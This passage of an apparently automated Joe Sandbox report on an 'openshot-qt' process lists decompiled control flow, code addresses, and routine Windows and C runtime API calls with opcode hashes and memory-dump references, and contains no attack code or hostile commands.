                                                                    											} else {
                                                                    												goto L21;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					L1:
                                                                    					return _t54;
                                                                    				}
                                                                    				L39:
                                                                    			}












































                                                                    0x00302540
                                                                    0x00302540
                                                                    0x00302543
                                                                    0x00302544
                                                                    0x00302545
                                                                    0x00302546
                                                                    0x00302549
                                                                    0x00302551
                                                                    0x00302560
                                                                    0x0030257f
                                                                    0x00302584
                                                                    0x0030258e
                                                                    0x00302597
                                                                    0x003025a1
                                                                    0x003025a6
                                                                    0x003025a9
                                                                    0x00000000
                                                                    0x003025ab
                                                                    0x003025ab
                                                                    0x003025b1
                                                                    0x003025b4
                                                                    0x00302660
                                                                    0x00302660
                                                                    0x00302662
                                                                    0x00302700
                                                                    0x00000000
                                                                    0x00302668
                                                                    0x00302668
                                                                    0x0030266f
                                                                    0x0030266f
                                                                    0x00302675
                                                                    0x0030279f
                                                                    0x00000000
                                                                    0x0030267b
                                                                    0x0030267b
                                                                    0x00302681
                                                                    0x00000000
                                                                    0x00302681
                                                                    0x00302675
                                                                    0x003025ba
                                                                    0x003025ba
                                                                    0x003025bf
                                                                    0x003025bf
                                                                    0x003025c1
                                                                    0x00302705
                                                                    0x00302705
                                                                    0x0030270b
                                                                    0x00000000
                                                                    0x00302711
                                                                    0x00302711
                                                                    0x00302718
                                                                    0x00302718
                                                                    0x00302718
                                                                    0x0030271b
                                                                    0x0030271d
                                                                    0x00302720
                                                                    0x00302726
                                                                    0x0030272c
                                                                    0x0030272e
                                                                    0x00302733
                                                                    0x00302739
                                                                    0x00302739
                                                                    0x00302741
                                                                    0x00000000
                                                                    0x00302741
                                                                    0x003025c7
                                                                    0x003025c7
                                                                    0x003025c7
                                                                    0x003025ca
                                                                    0x003025ca
                                                                    0x003025cc
                                                                    0x00000000
                                                                    0x003025d2
                                                                    0x003025d2
                                                                    0x003025d2
                                                                    0x003025d5
                                                                    0x003025d8
                                                                    0x003027a9
                                                                    0x003027ad
                                                                    0x003027b4
                                                                    0x003027bf
                                                                    0x003027c0
                                                                    0x003027c3
                                                                    0x003027d0
                                                                    0x003027d4
                                                                    0x003027d6
                                                                    0x00302808
                                                                    0x0030280a
                                                                    0x0030280c
                                                                    0x003027d8
                                                                    0x003027d8
                                                                    0x003027de
                                                                    0x003027e2
                                                                    0x003027e6
                                                                    0x003027ee
                                                                    0x003027f2
                                                                    0x003027fa
                                                                    0x003027fd
                                                                    0x003027fd
                                                                    0x00302811
                                                                    0x003025de
                                                                    0x003025de
                                                                    0x003025e1
                                                                    0x003025e7
                                                                    0x00000000
                                                                    0x003025ed
                                                                    0x003025ed
                                                                    0x00302617
                                                                    0x00302617
                                                                    0x00302617
                                                                    0x00302619
                                                                    0x00302619
                                                                    0x0030261c
                                                                    0x00302628
                                                                    0x00302628
                                                                    0x0030262e
                                                                    0x00302631
                                                                    0x00302631
                                                                    0x00302635
                                                                    0x00302638
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030263a
                                                                    0x0030263d
                                                                    0x003025ff
                                                                    0x003025ff
                                                                    0x00302601
                                                                    0x00302606
                                                                    0x00000000
                                                                    0x0030263f
                                                                    0x0030263f
                                                                    0x00302642
                                                                    0x003026d8
                                                                    0x003026e5
                                                                    0x003026e7
                                                                    0x003026ea
                                                                    0x003026ee
                                                                    0x003026f1
                                                                    0x003026f8
                                                                    0x00302608
                                                                    0x00302608
                                                                    0x0030260b
                                                                    0x00302611
                                                                    0x003026cd
                                                                    0x003026cd
                                                                    0x00302744
                                                                    0x00302744
                                                                    0x00302749
                                                                    0x0030274b
                                                                    0x00000000
                                                                    0x00302751
                                                                    0x00302757
                                                                    0x00302760
                                                                    0x00302769
                                                                    0x0030276c
                                                                    0x0030276e
                                                                    0x00302770
                                                                    0x00302772
                                                                    0x00302776
                                                                    0x0030277d
                                                                    0x00302784
                                                                    0x00302787
                                                                    0x00302789
                                                                    0x00302789
                                                                    0x0030278c
                                                                    0x0030278f
                                                                    0x0030278f
                                                                    0x0030279e
                                                                    0x0030279e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00302648
                                                                    0x00302648
                                                                    0x0030264c
                                                                    0x00302653
                                                                    0x00000000
                                                                    0x00302653
                                                                    0x00302642
                                                                    0x00000000
                                                                    0x0030263d
                                                                    0x00302690
                                                                    0x00302690
                                                                    0x00302697
                                                                    0x003026a2
                                                                    0x003026a5
                                                                    0x003026a8
                                                                    0x003026ab
                                                                    0x003026af
                                                                    0x003026b2
                                                                    0x003026ba
                                                                    0x003026c1
                                                                    0x003026c7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003026c7
                                                                    0x003025e7
                                                                    0x003025d8
                                                                    0x003025cc
                                                                    0x003025c1
                                                                    0x003025b4
                                                                    0x00302553
                                                                    0x00302553
                                                                    0x0030255a
                                                                    0x0030255a
                                                                    0x00000000

                                                                    Strings
                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 003027AD
                                                                    • Unknown pseudo relocation bit size %d., xrefs: 0030264C
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                    • API String ID: 0-395989641
                                                                    • Opcode ID: 282c11ea55fc5cf036a240d0f32124ed5f5b7fe4a667df3d7c345e4ab795f3e3
                                                                    • Instruction ID: eeec027a4856762358daffd808c7d17ae0b9784f372a27c3d761621ef1b8c804
                                                                    • Opcode Fuzzy Hash: 282c11ea55fc5cf036a240d0f32124ed5f5b7fe4a667df3d7c345e4ab795f3e3
                                                                    • Instruction Fuzzy Hash: F2719E35902305CFCB1ADF28D8B865BF7B5FF88340F25856AE8889B395D731E8058B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: fputwc$memset
                                                                    • String ID: o
                                                                    • API String ID: 822753988-252678980
                                                                    • Opcode ID: 839d4b0c5bbfac7300781d9ff7a04c1075e4204d317da38c8d79d7ab35c1173c
                                                                    • Instruction ID: 2a32d59df7c2dea437ceac687dd763ea37fe7d0bf045c93d6caabf0e22eb71cc
                                                                    • Opcode Fuzzy Hash: 839d4b0c5bbfac7300781d9ff7a04c1075e4204d317da38c8d79d7ab35c1173c
                                                                    • Instruction Fuzzy Hash: 43613B72E022199FCB15CF68D4946DDBBF5BF48350F168269E858AB395D330EE41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0030232F
                                                                    • Unknown error, xrefs: 003022E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-3474627141
                                                                    • Opcode ID: 1fea7ffc9e5ca6cfca5ced4070c815a3fda1cf4be5e59948d41cdf79a0e04578
                                                                    • Instruction ID: 7147866c7ca0bb984116cd0c86807a194736593d5ecd3723612ff64584694f51
                                                                    • Opcode Fuzzy Hash: 1fea7ffc9e5ca6cfca5ced4070c815a3fda1cf4be5e59948d41cdf79a0e04578
                                                                    • Instruction Fuzzy Hash: B201D274409B45CBC300AF15E49841AFFF1FF89350F868898E5C4462AACB3298A8C747
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,?,?,00307641,?,?,?,?,?,?,00000000,003059E4), ref: 00307537
                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,00307641,?,?,?,?,?,?,00000000,003059E4), ref: 00307574
                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,00307641,?,?,?,?,?,?,00000000,003059E4), ref: 00307580
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00307641,?,?,?,?,?,?,00000000,003059E4), ref: 003075A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Initialize$EnterSleep
                                                                    • String ID:
                                                                    • API String ID: 1117354567-0
                                                                    • Opcode ID: fac35b866a4ffe9e66da020b0c2ea349a90b96b85cd7995667a0b17f2acbc260
                                                                    • Instruction ID: 3e1c43ac83d3a2e76aba4e7bf9749c342d9611d130ad452a44a479313c93a542
                                                                    • Opcode Fuzzy Hash: fac35b866a4ffe9e66da020b0c2ea349a90b96b85cd7995667a0b17f2acbc260
                                                                    • Instruction Fuzzy Hash: DA1133F090B1008FDB23AB2CBCE519A37A8EB06300F560436D44AC7A91E675E9C5CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00302BAB,?,?,?,?,?,00302218), ref: 003029EE
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00302BAB,?,?,?,?,?,00302218), ref: 00302A15
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00302BAB,?,?,?,?,?,00302218), ref: 00302A1C
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00302BAB,?,?,?,?,?,00302218), ref: 00302A3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                    • String ID:
                                                                    • API String ID: 682475483-0
                                                                    • Opcode ID: ba8a424e7882362b5c10e50fce13472eb5a62289c3e7389b3b86df5383926b42
                                                                    • Instruction ID: 1b34cd7d729c3b9ad90fe9ea129505161606681ed5f8bd2b494876181d9ed004
                                                                    • Opcode Fuzzy Hash: ba8a424e7882362b5c10e50fce13472eb5a62289c3e7389b3b86df5383926b42
                                                                    • Instruction Fuzzy Hash: 7EF0A9796012118FD722BF79E9C855B7BA8EB08314F064478DD8447205DB30A859C792
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:12.5%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:6
                                                                    Total number of Limit Nodes:1
                                                                    execution_graph 13873 31f5710 13875 31f5737 13873->13875 13874 31f5814 13874->13874 13875->13874 13877 31f53a4 13875->13877 13878 31f67a0 CreateActCtxA 13877->13878 13880 31f6863 13878->13880

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 123 31f6795-31f679b 124 31f67a4-31f6861 CreateActCtxA 123->124 126 31f686a-31f68c4 124->126 127 31f6863-31f6869 124->127 134 31f68c6-31f68c9 126->134 135 31f68d3-31f68d7 126->135 127->126 134->135 136 31f68d9-31f68e5 135->136 137 31f68e8 135->137 136->137 139 31f68e9 137->139 139->139
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 031F6851
                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528906615.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_31f0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 1a5d8fc9298b9d0301fe891bc1d8b3a11b893c1d9e062220a4a57f05156279a2
                                                                    • Instruction ID: f691890094682125c49b247902b3baa42a4575d09d06f9f39211339580dfe616
                                                                    • Opcode Fuzzy Hash: 1a5d8fc9298b9d0301fe891bc1d8b3a11b893c1d9e062220a4a57f05156279a2
                                                                    • Instruction Fuzzy Hash: E641E0B1C00718CFDB24CFA9C98479DBBB6BF48304F24806AD419AB255DB755986CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 140 31f53a4-31f6861 CreateActCtxA 143 31f686a-31f68c4 140->143 144 31f6863-31f6869 140->144 151 31f68c6-31f68c9 143->151 152 31f68d3-31f68d7 143->152 144->143 151->152 153 31f68d9-31f68e5 152->153 154 31f68e8 152->154 153->154 156 31f68e9 154->156 156->156
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 031F6851
                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528906615.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_31f0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 5ac5a0d3caa1434fb291e0b5c2d493d109b33807de969c28173d5b051eddb907
                                                                    • Instruction ID: 1ff07366ebff997c6b7e6ea3bd4f8688266280b27f968599afe45dcffc6fdad2
                                                                    • Opcode Fuzzy Hash: 5ac5a0d3caa1434fb291e0b5c2d493d109b33807de969c28173d5b051eddb907
                                                                    • Instruction Fuzzy Hash: 7541C0B1D00718CFDB24DFA9C98478DBBB6BF48304F24806AD509AB255D7756985CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528734640.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_310d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47486cf48aaf94b54fcf0a49fa79e5dbd720ff4ca96d008ca1a282bf75745aab
                                                                    • Instruction ID: d5e74fc239a5cf80815a52450f0fb28944659a35ac54f0f007c0983d9eed6b7d
                                                                    • Opcode Fuzzy Hash: 47486cf48aaf94b54fcf0a49fa79e5dbd720ff4ca96d008ca1a282bf75745aab
                                                                    • Instruction Fuzzy Hash: B9212875500244DFDB05DF58E9C0B1BBF66FB8C324F2886A9E8090B286C776D856CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528762695.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_311d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5edf54fa22c3077e04c61e61e77061d43b497d10c02bddb5512b8da00acc4522
                                                                    • Instruction ID: e693f37990a1e7e5afbdd10cb82e83229538b4237d64145d3e24fe4c6b062742
                                                                    • Opcode Fuzzy Hash: 5edf54fa22c3077e04c61e61e77061d43b497d10c02bddb5512b8da00acc4522
                                                                    • Instruction Fuzzy Hash: CD213775604244DFDB44DF18E9C0B66BB66FB88314F28C5BDD8094B256C33BD856CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528762695.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_311d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7eb1ad71df3344eccaf11468ab0080af1556fd96d1604b47dbea1a9cac0838d8
                                                                    • Instruction ID: 145e11cec63fe7ffeb0d74f924953ed9e586620822d92106bcf7624afa0a5be2
                                                                    • Opcode Fuzzy Hash: 7eb1ad71df3344eccaf11468ab0080af1556fd96d1604b47dbea1a9cac0838d8
                                                                    • Instruction Fuzzy Hash: 9C115EB1544344DFDB14DF28E9C0B76BB69FB48314F248ABDD4454B241C33AD497C662
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528734640.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_310d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                    • Instruction ID: f5e8e2b778720a9c4249083e3e078dd7f4a26ada20082a089836103eef97ffde
                                                                    • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                    • Instruction Fuzzy Hash: 5611D376504280CFCB02CF54D9C4B16BF72FB88328F28C6A9D8440B656C33AD456CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528717961.0000000003103000.00000040.00000800.00020000.00000000.sdmp, Offset: 03103000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_3103000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afed1bf63121b9909fc00b267f7154de0b3aaeda16cad8ba0f525054a0ec1516
                                                                    • Instruction ID: 9e3664931aa1e6c8dfbe6c0ebf940abd91e7522ac798aeebaca5d191729d36b8
                                                                    • Opcode Fuzzy Hash: afed1bf63121b9909fc00b267f7154de0b3aaeda16cad8ba0f525054a0ec1516
                                                                    • Instruction Fuzzy Hash: 1C116D761497C09FE312CB19D980B52BFB8EF46614F0888DBD9848F6A3C3699844CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528762695.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_311d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                    • Instruction ID: f1f64e82e8adfcdfc4ec5963832985fb839a53ba8fd4b262c1d8895eb98f039c
                                                                    • Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                    • Instruction Fuzzy Hash: D2118B76504280DFDB05CF14E9C4B65BBB1FB88224F28C6ADD8494B656C33AD45ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528717961.0000000003103000.00000040.00000800.00020000.00000000.sdmp, Offset: 03103000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_3103000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 419e6245e8b2b834796c9e594a609088caa94026a5ee460af04f82858eb4efa8
                                                                    • Instruction ID: 212017eab92f61413c3a1170637222e24483e0c7b6f78eba6e8a07c1ac3847b8
                                                                    • Opcode Fuzzy Hash: 419e6245e8b2b834796c9e594a609088caa94026a5ee460af04f82858eb4efa8
                                                                    • Instruction Fuzzy Hash: 4411C679104684DFE724CF1ADA80B26FBA8FB58720F08C85EE9455B645C37DA844CB71
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000021.00000002.528762695.000000000311D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0311D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_33_2_311d000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5257113e35fd960b75e5d9ce70b764863701967226d36fc2c84637f8f85fafe
                                                                    • Instruction ID: 208943613d86fdca351f55ad61e75085fb50c9c9d848837073f8baa6118962a2
                                                                    • Opcode Fuzzy Hash: a5257113e35fd960b75e5d9ce70b764863701967226d36fc2c84637f8f85fafe
                                                                    • Instruction Fuzzy Hash: 2B1191725093C08FDB12DF24D984765BF70EB46214F2986EEC4898B693C33A945ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%